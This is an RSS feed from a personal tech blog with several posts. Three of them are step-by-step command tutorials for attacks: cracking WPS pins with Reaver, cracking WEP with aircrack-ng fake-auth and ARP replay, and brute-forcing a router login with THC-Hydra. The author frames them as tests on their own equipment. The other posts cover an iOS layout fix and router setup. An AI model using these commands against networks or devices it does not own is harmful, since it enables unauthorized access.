<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Silly Chicken</title>
	<atom:link href="http://www.sillychicken.co.nz/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.sillychicken.co.nz</link>
	<description>The boat engine makes noise.....</description>
	<lastBuildDate>Sun, 01 Jan 2012 06:24:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>iPhone 20px white line in viewcontroller</title>
		<link>http://www.sillychicken.co.nz/2012/01/ios-20px-white-line-in-viewcontroller/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ios-20px-white-line-in-viewcontroller</link>
		<comments>http://www.sillychicken.co.nz/2012/01/ios-20px-white-line-in-viewcontroller/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 06:17:26 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[20px white]]></category>
		<category><![CDATA[IOS]]></category>
		<category><![CDATA[iphone]]></category>

		<guid isPermaLink="false">http://www.sillychicken.co.nz/?p=241</guid>
		<description><![CDATA[Do you have a 20px white line at the bottom of your iPhone app? Do the following in your AppDelegate when you are adding your first controller self.window.rootViewController = &#8220;Your View Controller&#8221; if you use [self.window addSubview:"Your View Controller".view] you will end up being 20px out]]></description>
			<content:encoded><![CDATA[<p>Do you have a 20px white line at the bottom of your iPhone app? Do the following in your AppDelegate when you are adding your first controller</p>
<blockquote><p>self.window.rootViewController = &#8220;Your View Controller&#8221;</p></blockquote>
<p>if you use [self.window addSubview:"Your View Controller".view] you will end up being 20px out</p>
<p><a href="http://www.sillychicken.co.nz/wp-content/uploads/2012/01/Screen-Shot-2012-01-01-at-7.15.54-PM.png"><img class="alignnone size-full wp-image-242" title="Screen Shot 2012-01-01 at 7.15.54 PM" src="http://www.sillychicken.co.nz/wp-content/uploads/2012/01/Screen-Shot-2012-01-01-at-7.15.54-PM.png" alt="" width="378" height="231" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2012/01/ios-20px-white-line-in-viewcontroller/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Crack wifi Protect setup (WPS) to access wifi network</title>
		<link>http://www.sillychicken.co.nz/2011/12/crack-wifi-protect-setup-wps-to-access-wifi-network/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=crack-wifi-protect-setup-wps-to-access-wifi-network</link>
		<comments>http://www.sillychicken.co.nz/2011/12/crack-wifi-protect-setup-wps-to-access-wifi-network/#comments</comments>
		<pubDate>Sat, 31 Dec 2011 03:13:31 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Slider]]></category>

		<guid isPermaLink="false">http://www.sillychicken.co.nz/?p=227</guid>
		<description><![CDATA[Reaver performs a brute force attack against an access point&#8217;s WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP&#8217;s wireless settings can be reconfigured. Requires linux &#160; wget http://reaver-wps.googlecode.com/files/reaver-1.2.tar.gz tar -xzvf reaver-1.2.tar.gz cd reaver-1.2/src/ ./configure make make install airmon-ng wlan0 reaver -i mon0 -b -vv Doesn&#8217;t work against my Belkin N300]]></description>
			<content:encoded><![CDATA[<p>Reaver performs a brute force attack against an access point&#8217;s WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP&#8217;s wireless settings can be reconfigured.</p>
<p>Requires linux</p>
<p style='width:30px'>&nbsp;</p>
<blockquote><p>
wget http://reaver-wps.googlecode.com/files/reaver-1.2.tar.gz<br />
tar -xzvf reaver-1.2.tar.gz<br />
cd reaver-1.2/src/<br />
./configure<br />
make<br />
make install<br />
airmon-ng wlan0<br />
reaver -i mon0 -b <TARGET MAC> -vv
</p></blockquote>
<p>Doesn&#8217;t work against my Belkin N300</p>
<p><a href="http://www.sillychicken.co.nz/wp-content/uploads/2011/12/Screen-Shot-2011-12-31-at-4.11.22-PM.png"><img src="http://www.sillychicken.co.nz/wp-content/uploads/2011/12/Screen-Shot-2011-12-31-at-4.11.22-PM.png" alt="" title="Screen Shot 2011-12-31 at 4.11.22 PM" width="387" height="101" class="alignnone size-full wp-image-230" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/12/crack-wifi-protect-setup-wps-to-access-wifi-network/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cracking WEP no clients from Virtual Machine</title>
		<link>http://www.sillychicken.co.nz/2011/11/cracking-wep-no-clients-from-virtual-machine/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=cracking-wep-no-clients-from-virtual-machine</link>
		<comments>http://www.sillychicken.co.nz/2011/11/cracking-wep-no-clients-from-virtual-machine/#comments</comments>
		<pubDate>Mon, 28 Nov 2011 08:15:36 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Slider]]></category>
		<category><![CDATA[Aircrack-ng]]></category>
		<category><![CDATA[ALFA AWUS036h]]></category>
		<category><![CDATA[backtrack 5]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[no clients]]></category>
		<category><![CDATA[VM]]></category>
		<category><![CDATA[WEP cracking]]></category>

		<guid isPermaLink="false">http://www.sillychicken.co.nz/?p=190</guid>
		<description><![CDATA[Ok another WEP cracking guide because I just felt there wasn&#8217;t enough out there already I am going to crack my wireless access point with a Macbook pro running Backtrack 5 as a virtual machine. To do this in a virtual machine you must use a usb wifi adapter, built in hardware will NOT WORK in a VM. Watch the video to see it in action and then read the post full the break down http://www.youtube.com/watch?v=1zBQrkdt45w My setup is as follows Backtrack 5 R1 VM USB Alfa AWUS036H (100mW) wifi adapter with 5dB arial (Very cheap off eBay and a<a href="http://www.sillychicken.co.nz/2011/11/cracking-wep-no-clients-from-virtual-machine/">&#160;&#160;[ Read More ]</a>]]></description>
			<content:encoded><![CDATA[<p>Ok another WEP cracking guide because I just felt there wasn&#8217;t enough out there already <img src='http://www.sillychicken.co.nz/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>I am going to crack my wireless access point with a Macbook pro running Backtrack 5 as a virtual machine.  To do this in a virtual machine you must use a usb wifi adapter, built in hardware will NOT WORK in a VM.</p>
<p>Watch the video to see it in action and then read the post full the break down</p>
<p><a href="http://www.youtube.com/watch?v=1zBQrkdt45w&#038;fmt=18">http://www.youtube.com/watch?v=1zBQrkdt45w</a></p>
<h2>My setup is as follows</h2>
<ul>
<li>Backtrack 5 R1 VM</li>
<li>USB Alfa AWUS036H (100mW) wifi adapter with 5dB arial (Very cheap off eBay and a lot with free delivery out there)</li>
</ul>
<p><span id="more-190"></span></p>
<div>
<h3><span style="color: #ff0000;">**For educational purposes only</span></h3>
<p>**Note if you have Ubuntu you can install aircrack-ng and perform the same crack.</p>
</div>
<blockquote>
<div><strong>sudo apt-get install aircrack-ng</strong></div>
</blockquote>
<div>First run <strong>iwconfig</strong> it will list all your interfaces and show you which have wireless extensions. <strong>wlan0</strong> is the general default and this is the name of our interface. The Alfa wireless card has a higher power output than is normally found but by default wont use it, Notice the <strong>TX Power</strong> is 20dB that is 100mW we need 30db for 1000mW.</div>
<p>run this command (only if you have a high powered card like the Alfa)</p>
<blockquote>
<div><strong>iw reg set NZ</strong></div>
</blockquote>
<div>replace NZ with your 2 character country code &#8211; upper case.</div>
<p> <span style="color:red">Important to note you may not be able to reach 1000mW depending on the laws set in your country.</span></p>
<div>Down &#038; up the card with (Take note i<strong>f</strong>config and i<strong>w</strong>config are two different commands)</div>
<blockquote>
<div><strong>ifconfig wlan0 down</strong></div>
<div><strong>ifconfig wlan0 up</strong></div>
<div><strong>iwconfig</strong></div>
</blockquote>
<p>If it has worked you should see the <strong>TX Power</strong> is now at 30dB, we can now get started.<br />
Your wireless adapter must be in monitor mode, most wireless cards require special drivers and the guys behind Backtrack have taken care of this for us.</p>
<blockquote>
<div><strong>airmon-ng start wlan0</strong></div>
</blockquote>
<div>This will create another interface for us called <strong>mon0 (zero)</strong> which is our in wireless interface in monitor mode, you must use this interface for all attacks and not wlan0. Now we will scan for access points</div>
<blockquote>
<div><strong>airodump-ng mon0</strong></div>
</blockquote>
<div>Find your target and take note of the &#8220;BSSID&#8221; (mac address) of the the access point and the <strong>CH</strong>annel we will re run the command with our extra parameters</div>
<blockquote>
<div><strong>airodump-ng mon0 -c 6 &#8211;bssid 00:1c:8c:d0:70:ec -w crackme</strong></div>
</blockquote>
<div>mon0 = our interface</div>
<div>-c 6 = channel 6 (or whatever your channel maybe)</div>
<div>&#8211;bssid = Mac address of the access point as shown by airodump</div>
<div>-w = output the result to this file (A must so we can crack it later)</div>
<p>Leave this window running and open a second terminal, we will fake authenticate our wifi card with the device, if we don&#8217;t the replay attack will fail. If there are devices on the network skip to the replay attack.</p>
<blockquote>
<div><strong>aireplay mon0 -1 3 -a <strong>00:1c:8c:d0:70:ec </strong></strong></div>
</blockquote>
<div>-1 3 = Attack type of &#8220;Fake Authenticate&#8221; and the 3 represents how many times 1-100 3 is a suitable number.</div>
<div>-a = Mac address of the access point as shown by airodump same value as entered into the &#8220;BSSID&#8221; in the first command.</div>
<p>All going well you will see &#8220;Association successful <img src='http://www.sillychicken.co.nz/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> &#8221;</p>
<p>Now to perform a ARP replay attack which captures a ARP packets and sends it over and over to generate traffic on the access point. Modify your command so it looks like this</p>
<blockquote>
<div><strong>aireplay mon0 -3 -b <strong>00:1c:8c:d0:70:ec </strong></strong></div>
</blockquote>
<div>-3 = Attack type (ARP Replay).</div>
<div>-b = Mac address of the access point as shown by airodump same value as entered into the &#8220;BSSID&#8221; in the first command and same as &#8220;a&#8221; in the previous command.</div>
<p>Give it some time and all going well you will start to see the &#8220;Data&#8221; figure from the aircrack window start to increase.</p>
<p>Once that begins its just a matter of time before it&#8217;s cracked, you can start cracking the file right away even while data is still begin collected. Open yet a third console and run</p>
<blockquote>
<div><strong>aircrack-ng crackme</strong></div>
</blockquote>
<div>&#8220;crackme&#8221; is the path and or file name you used in the aircrack &#8220;-w&#8221; parameter</div>
<p>The password will not be recovered until enough data has been collected, it will automatically retry once the data increases.</p>
<p>Watch the video if you are unclear</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/11/cracking-wep-no-clients-from-virtual-machine/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Downtime</title>
		<link>http://www.sillychicken.co.nz/2011/11/downtime/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=downtime</link>
		<comments>http://www.sillychicken.co.nz/2011/11/downtime/#comments</comments>
		<pubDate>Wed, 16 Nov 2011 09:57:33 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.sillychicken.co.nz/?p=161</guid>
		<description><![CDATA[Oops our hosting plan ran out of bandwidth but all is right again.]]></description>
			<content:encoded><![CDATA[<p>Oops our hosting plan ran out of bandwidth but all is right again.</p>
<p><a href="http://www.theoatmeal.com"><img class="size-medium wp-image-179 alignnone" title="tumblr" src="http://www.sillychicken.co.nz/wp-content/uploads/2011/11/tumblr-300x285.jpg" alt="" width="300" height="285" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/11/downtime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Website</title>
		<link>http://www.sillychicken.co.nz/2011/10/new-website/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=new-website</link>
		<comments>http://www.sillychicken.co.nz/2011/10/new-website/#comments</comments>
		<pubDate>Sat, 22 Oct 2011 09:01:25 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Slider]]></category>

		<guid isPermaLink="false">http://wordpress.sillychicken.co.nz/?p=69</guid>
		<description><![CDATA[Hello all!! I have changed over to WordPress from Joomla and of some content has shifted around, I have not brought across the comments so please get commenting again!! Follow us on twitter to keep up to date with new articles. &#160;]]></description>
			<content:encoded><![CDATA[<p>Hello all!!</p>
<p>I have changed over to WordPress from Joomla and of some content has shifted around, I have not brought across the comments so please get commenting again!!</p>
<p>Follow us on twitter to keep up to date with new articles.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/10/new-website/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HB Speedway &#8211; Feb 11 &#8211; Street Stocks</title>
		<link>http://www.sillychicken.co.nz/2011/10/hb-speedway-feb-11-street-stocks/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=hb-speedway-feb-11-street-stocks</link>
		<comments>http://www.sillychicken.co.nz/2011/10/hb-speedway-feb-11-street-stocks/#comments</comments>
		<pubDate>Wed, 12 Oct 2011 08:47:06 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://wordpress.sillychicken.co.nz/?p=37</guid>
		<description><![CDATA[&#160; &#160;]]></description>
			<content:encoded><![CDATA[<p><span class="Apple-style-span" style="font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px; white-space: pre;"></span></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/10/hb-speedway-feb-11-street-stocks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ASUS WL-520GC Restore firmware from Bricked Unit</title>
		<link>http://www.sillychicken.co.nz/2011/10/asus-wl-520gc-restore-firmware-from-bricked-unit/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=asus-wl-520gc-restore-firmware-from-bricked-unit</link>
		<comments>http://www.sillychicken.co.nz/2011/10/asus-wl-520gc-restore-firmware-from-bricked-unit/#comments</comments>
		<pubDate>Mon, 10 Oct 2011 08:39:25 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Hardware]]></category>

		<guid isPermaLink="false">http://wordpress.sillychicken.co.nz/?p=22</guid>
		<description><![CDATA[A quick guide to get your ASUS WL-520GC back to factory firmware if you have a bad flash (AKA Bricked). &#160; You will need; &#160; 1. ASUS Firmware utility 2. Original firmware &#160; You can find both of the above from the ASUS website or simply download from links below ASUS Utility ASUS WL-520GC Firmware &#160; As always proceed at your own risk First we need to get the ASUS into recovery mode, do this by holding the reset button for 3-5 seconds, the power button will begin to blink slowly (2 seconds on 2 seconds off) Connect your computer directly to<a href="http://www.sillychicken.co.nz/2011/10/asus-wl-520gc-restore-firmware-from-bricked-unit/">&#160;&#160;[ Read More ]</a>]]></description>
			<content:encoded><![CDATA[<div>
<p>A quick guide to get your ASUS WL-520GC back to factory firmware if you have a bad flash (AKA Bricked).</p>
<p>&nbsp;</p>
<p>You will need;</p>
<p>&nbsp;</p>
<p>1. ASUS Firmware utility</p>
<p>2. Original firmware</p>
<p>&nbsp;</p>
<p>You can find both of the above from the <a href="http://www.asus.com/Product.aspx?P_ID=Pq3TmwugpKCFDkV5&amp;content=specifications" target="_blank">ASUS website</a> or simply download from links below</p>
<ul>
<li><a href="http://www.sillychicken.co.nz/downloads/UT_WL_520GC_3540.zip">ASUS Utility</a></li>
<li><a href="http://www.sillychicken.co.nz/downloads/FW_WL520gc_2010_EN.zip">ASUS WL-520GC Firmware</a></li>
</ul>
<p><span id="more-22"></span></p>
<p>&nbsp;</p>
<p><strong>As always proceed at your own risk</strong></p>
<p>First we need to get the ASUS into recovery mode, do this by holding the reset button for 3-5 seconds, the power button will begin to blink slowly (2 seconds on 2 seconds off)</p>
<p>Connect your computer directly to the ASUS router with a LAN cable</p>
<p>&nbsp;</p>
<p>Next we need to give our LAN a static IP address on the devices range (Default IP of the ASUS is 192.168.1.1) so we will set a IP address of our pc to something in the same range. Test if you can ping 192.168.1.1</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/1-29-2011%205-40-30%20pm.png" alt="" border="0" /></p>
<p>Extract FW_WL520gc_2010_EN.zip to your desktop so it is easy to locate</p>
<p>&nbsp;</p>
<p>Now we need to extract the contents of UT_WL_520GC_3540.zip and run the setup wizard. Once installed run the ASUS Firmware Restoration tool</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/1-29-2011%206-10-55%20pm.png" alt="" width="300px" border="0" /></p>
<p>&nbsp;</p>
<p>Locate the firmware you extract to your desktop,select it, hit upload. Wait for the tool to finish and you should be back to original firmware.</p>
<p>&nbsp;</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/1-29-2011%206-14-12%20pm.png" alt="" border="0" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><img src="file:///C:/DOCUME~1/User/LOCALS~1/Temp/moz-screenshot.png" alt="" border="0" /></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/10/asus-wl-520gc-restore-firmware-from-bricked-unit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to brute force your router in windows</title>
		<link>http://www.sillychicken.co.nz/2011/10/how-to-brute-force-your-router-in-windows/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=how-to-brute-force-your-router-in-windows</link>
		<comments>http://www.sillychicken.co.nz/2011/10/how-to-brute-force-your-router-in-windows/#comments</comments>
		<pubDate>Thu, 06 Oct 2011 05:18:40 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://wordpress.sillychicken.co.nz/?p=74</guid>
		<description><![CDATA[This will give you a quick run down on how to brute force your router if it uses HTTP BASIC AUTH using THC-HYDRA If you receive a popup window when you try to access your router, then this method should work for you. Read the article then watch the movie THC-Hydra &#8211; can be downloaded from their site here Password list &#8211; try openwall&#8217;s free list Find your router IP, you should already know this, mine is 192.168.1.2. It is a DSL-G604T and the default username for this router is &#8220;admin&#8221;. If for some reason you can&#8217;t remember yours try a<a href="http://www.sillychicken.co.nz/2011/10/how-to-brute-force-your-router-in-windows/">&#160;&#160;[ Read More ]</a>]]></description>
			<content:encoded><![CDATA[<p align="align">This will give you a quick run down on how to brute force your router if it uses HTTP BASIC AUTH</p>
<p align="align">using <a href="http://freeworld.thc.org/thc-hydra/" target="_blank">THC-HYDRA</a></p>
<p align="align">If you receive a popup window when you try to access your router, then this method should work for you.</p>
<p align="align"><a href="http://www.sillychicken.co.nz/wp-content/uploads/2011/10/routerscreen_basicauth.gif"><img class="size-medium wp-image-174 alignnone" title="routerscreen_basicauth" src="http://www.sillychicken.co.nz/wp-content/uploads/2011/10/routerscreen_basicauth-300x125.gif" alt="" width="300" height="125" /></a></p>
<p>Read the article then watch the movie</p>
<p></p>
<p align="align"><span id="more-74"></span></p>
<p>THC-Hydra &#8211; can be downloaded from their site <a href="http://freeworld.thc.org/thc-hydra/" target="_blank">here</a><br />
Password list &#8211; try <a href="http://www.openwall.com/passwords/wordlists/password.lst" target="_blank">openwall&#8217;s</a> free list</p>
<p>Find your router IP, you should already know this, mine is 192.168.1.2. It is a DSL-G604T and the default username for this router is &#8220;admin&#8221;.<br />
If for some reason you can&#8217;t remember yours try a default password site such as <a href="http://www.cirt.net/" target="_blank">CIRT.net</a></p>
<p>Make sure you have downloaded and extracted THC-Hydra. I have extracted mine to C:\CMD\Hydra in this example and I also have my password list in the Hydra directory.</p>
<p><a href="http://www.sillychicken.co.nz/wp-content/uploads/2011/10/hydra_cmd.gif"><img class="size-full wp-image-175 alignnone" title="hydra_cmd" src="http://www.sillychicken.co.nz/wp-content/uploads/2011/10/hydra_cmd.gif" alt="" width="400" height="202" /></a></p>
<p>Open a command prompt and navigate to the Hydra directory<br />
to change directory in dos used the &#8220;CD&#8221; command followed by the path <strong>CD C:\CMD\Hydra</strong></p>
<p>run the command below substituting in your values<br />
(command flags are case sensitive).</p>
<p><strong>hydra -l {username} -P {password list path} -s {port} {IP Address} http-get /</strong><br />
My command looks like:<br />
<strong>hydra -l admin -P password.lst -s 80 192.168.1.2 http-get /</strong></p>
<p>Command break down:<br />
<strong>hydra</strong> &#8211;&gt; the hydra program<br />
<strong>-l</strong> &#8211;&gt; (lower case &#8220;L&#8221; not to be confused with a upper case i) single username to target. Use uppercase -L to specify a username list<br />
<strong>-P</strong> &#8211;&gt; provide path to password lis. -p to try a single password ie &#8220;passw0rd&#8221;<br />
<strong>-s</strong> &#8211;&gt; port to target your router may run on a different port such as 8080<br />
{IP Address} hopefully this is clear<br />
<strong>http-get</strong> &#8211;&gt; service to brute force<br />
<strong>&#8220;/&#8221;</strong> &#8211;&gt; this specifies the page to target if this is left out the command will not run. &#8220;/&#8221; just indicates the root do not include the &#8221;<br />
you will get an output line with username and password if you are successful.<br />
This attack is only as good as your dictionary.</p>
<p><em>Next how to brute force web forms, check it out!!</em></p>
<p><span style="color: #ff0000;"><strong><em>IMPORTANT:</em></strong></span><br />
<span style="color: #ff0000;"><strong><em>This is for educational purposes only, dont go attacking devices which don&#8217;t belong to you</em> .</strong></span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/10/how-to-brute-force-your-router-in-windows/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Aircrack-ng fixed channel mon0: -1</title>
		<link>http://www.sillychicken.co.nz/2011/08/aircrack-ng-fixed-channel-mon0-1/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=aircrack-ng-fixed-channel-mon0-1</link>
		<comments>http://www.sillychicken.co.nz/2011/08/aircrack-ng-fixed-channel-mon0-1/#comments</comments>
		<pubDate>Mon, 22 Aug 2011 08:42:08 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://wordpress.sillychicken.co.nz/?p=26</guid>
		<description><![CDATA[Aircrack would not play nice on Ubuntu with a Intel Wireless iwl3945 wifi adapter It would always say &#8220;mon0 is on channel -1, but the AP uses channel x&#8221; &#160; Solution: You need to patch the compact-wireless package and rebuild Copy and paste the below commands into a terminal Install your kernel headers if you don&#8217;t already have them, if you do skip the first command &#160; Code: sudo apt-get install linux-headers-$(uname -r) wget http://www.orbit-lab.org/kernel/compat-wireless-3.0-stable/v3.0/compat-wireless-3.0-2.tar.bz2 tar -jxf compat-wireless-3.0-2.tar.bz2 cd compat-wireless-3.0-2 wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch sudo apt-get install patch patch ./net/wireless/chan.c channel-negative-one-maxim.patch make sudo make install sudo make unload sudo reboot]]></description>
			<content:encoded><![CDATA[<div>
<p>Aircrack would not play nice on Ubuntu with a Intel Wireless iwl3945 wifi adapter</p>
<p>It would always say &#8220;mon0 is on channel -1, but the AP uses channel x&#8221;</p>
<p>&nbsp;</p>
<p><strong>Solution:<br />
</strong></p>
<p>You need to patch the compact-wireless package and rebuild</p>
<p>Copy and paste the below commands into a terminal</p>
<p>Install your kernel headers if you don&#8217;t already have them, if you do skip the first command</p>
<p>&nbsp;</p>
<p>Code:</p>
<pre dir="ltr">sudo apt-get install linux-headers-$(uname -r)
wget http://www.orbit-lab.org/kernel/compat-wireless-3.0-stable/v3.0/compat-wireless-3.0-2.tar.bz2
tar -jxf compat-wireless-3.0-2.tar.bz2
cd compat-wireless-3.0-2
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
sudo apt-get install patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
make
sudo make install
sudo make unload
sudo reboot</pre>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/08/aircrack-ng-fixed-channel-mon0-1/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Asus WL-520GC into repeater bridge mode with dd-wrt</title>
		<link>http://www.sillychicken.co.nz/2011/07/asus-wl-520gc-into-repeater-bridge-mode-with-dd-wrt/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=asus-wl-520gc-into-repeater-bridge-mode-with-dd-wrt</link>
		<comments>http://www.sillychicken.co.nz/2011/07/asus-wl-520gc-into-repeater-bridge-mode-with-dd-wrt/#comments</comments>
		<pubDate>Fri, 22 Jul 2011 08:43:50 +0000</pubDate>
		<dc:creator>Sillychicken</dc:creator>
				<category><![CDATA[Hardware]]></category>

		<guid isPermaLink="false">http://wordpress.sillychicken.co.nz/?p=29</guid>
		<description><![CDATA[Standard bridge mode does not allow wifi clients to connect to the ASUS running DD-WRT only wired clients&#8230;. But if you use repeater bridge mode you can have wired and wifi clients accessing the bridge extending your network. &#160; Make sure you have followed the steps outlined in the following guide and the system is working before you move onto this or you will have problems !! &#160; For those just joining my setup is as follows &#160; Dlink G604T ADSL Router Primary wifi SSID: JANDD Security: WPA PSK (TKIP) IP: 192.168.1.2 DHCP: On &#160; Asus WL-520GC in bridge mode connected to the dlink<a href="http://www.sillychicken.co.nz/2011/07/asus-wl-520gc-into-repeater-bridge-mode-with-dd-wrt/">&#160;&#160;[ Read More ]</a>]]></description>
			<content:encoded><![CDATA[<div>
<p>Standard bridge mode does not allow wifi clients to connect to the ASUS running DD-WRT only wired clients&#8230;. But if you use <strong>repeater bridge</strong> mode you can have wired and wifi clients accessing the bridge extending your network.</p>
<p>&nbsp;</p>
<p>Make sure you have followed the steps outlined in the <a href="http://www.sillychicken.co.nz/General/asus-wl-520gc-into-bridge-mode-with-dd-wrt.html">following guide</a> and the system is working before you move onto this or you will have problems !!</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/screen-shot-2010-11-20-at-6.07.45-pm.jpg" alt="" width="650" border="0" /></p>
<p>&nbsp;</p>
<p><span id="more-29"></span></p>
<p>For those just joining my setup is as follows</p>
<p>&nbsp;</p>
<p>Dlink G604T ADSL Router Primary wifi</p>
<p>SSID: JANDD</p>
<p>Security: WPA PSK (TKIP)</p>
<p>IP: 192.168.1.2</p>
<p>DHCP: On</p>
<p>&nbsp;</p>
<p>Asus WL-520GC in bridge mode connected to the dlink wifi, xbox 360 conneted via ethernet port&#8230; xbox live works yay.</p>
<p>IP: 192.168.1.5</p>
<p>&nbsp;</p>
<p>OK lets get started</p>
<p>&nbsp;</p>
<p>Login to your ASUS WL-520 and navigate to <strong>Wireless &#8211; Basic Setup</strong></p>
<p>&nbsp;</p>
<p>Change Wireless Mode to &#8220;Repeater Bridge&#8221; as below &#8211; Hit Save</p>
<p>You will now have &#8220;Virtual Interfaces&#8221; click Add</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/screen%20shot%202010-11-20%20at%205.16.56%20pm.png" alt="" border="0" /></p>
<p>&nbsp;</p>
<p>Enter a new SSID it&#8217;s recommended it is different than your primary SSID, you can have it the same but you may have issues.</p>
<p>I am calling mine &#8220;JANDD2&#8243; &#8211; Hit Save</p>
<p>&nbsp;</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/screen%20shot%202010-11-20%20at%205.17.46%20pm.png" alt="" border="0" /></p>
<p>Navigate to <strong>Wireless &#8211; Wireless Security </strong>where<strong> </strong>we can see our new interface that we just added &#8220;JANDD2&#8243;.  Now configure the details of the new wifi to be the same as the primary, same security mode and password &#8211; Hit Save</p>
<p>&nbsp;</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/screen%20shot%202010-11-20%20at%205.26.26%20pm.png" alt="" border="0" /></p>
<p>Navigate to <strong>Setup &#8211; Basic Setup</strong> set STP to disabled &#8211; Hit Save</p>
<p>Navigate to <strong>Setup &#8211; Advanced Routing </strong>change operating mode to router &#8211; Hit Save</p>
<p>Navigate to <strong>Services </strong>disable DNSMasq &#8211; Hit Save</p>
<p>Navigate to <strong>Security &#8211; Firewall </strong>disable SPI Firewall, untick all except filter multicast &#8211; Hit Save</p>
<p>&nbsp;</p>
<p><img src="http://www.sillychicken.co.nz/images/SC/screen%20shot%202010-11-20%20at%205.45.49%20pm.png" alt="" border="0" /></p>
<p>&nbsp;</p>
<p>Now Hit &#8211; Apply Settings</p>
<p>Navigate to <strong>Administration &#8211; Management </strong>and reboot router wait a couple minutes for it to come up and enjoy !!</p>
<p>&nbsp;</p>
<p>Credit to the good people at DD-WRT for this, this information has just been regurgitated.</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.sillychicken.co.nz/2011/07/asus-wl-520gc-into-repeater-bridge-mode-with-dd-wrt/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

